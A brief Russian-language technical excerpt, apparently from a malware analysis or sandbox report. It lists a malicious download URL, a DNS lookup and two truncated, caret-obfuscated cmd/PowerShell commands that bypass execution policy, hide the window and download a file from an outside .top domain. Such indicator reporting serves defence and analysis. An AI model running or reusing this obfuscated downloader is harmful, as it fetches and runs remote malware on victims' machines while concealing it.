Техническая информация
- http://www.fopeioaas.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOWerSHELl^.Ex^e^ -Ex^e^CU^t^iOn^po^liCY b^Y^PAs^S -^NOp^RofiL^e ^-^wi^NdOWStY^l^E^ HID^d^En (neW^-ObjEct sY^sTem.NE^T.wE^bClIeN^t).DoWNL^oAd^F^i^L^E(^'http://www.fopeioaas.t...
- DNS ASK fo###oaas.top
- '<SYSTEM32>\cmd.exe' /c "pOWerSHELl^.Ex^e^ -Ex^e^CU^t^iOn^po^liCY b^Y^PAs^S -^NOp^RofiL^e ^-^wi^NdOWStY^l^E^ HID^d^En (neW^-ObjEct sY^sTem.NE^T.wE^bClIeN^t).DoWNL^oAd^F^i^L^E(^'http://www.fopeioaas.t...' (со скрытым окном)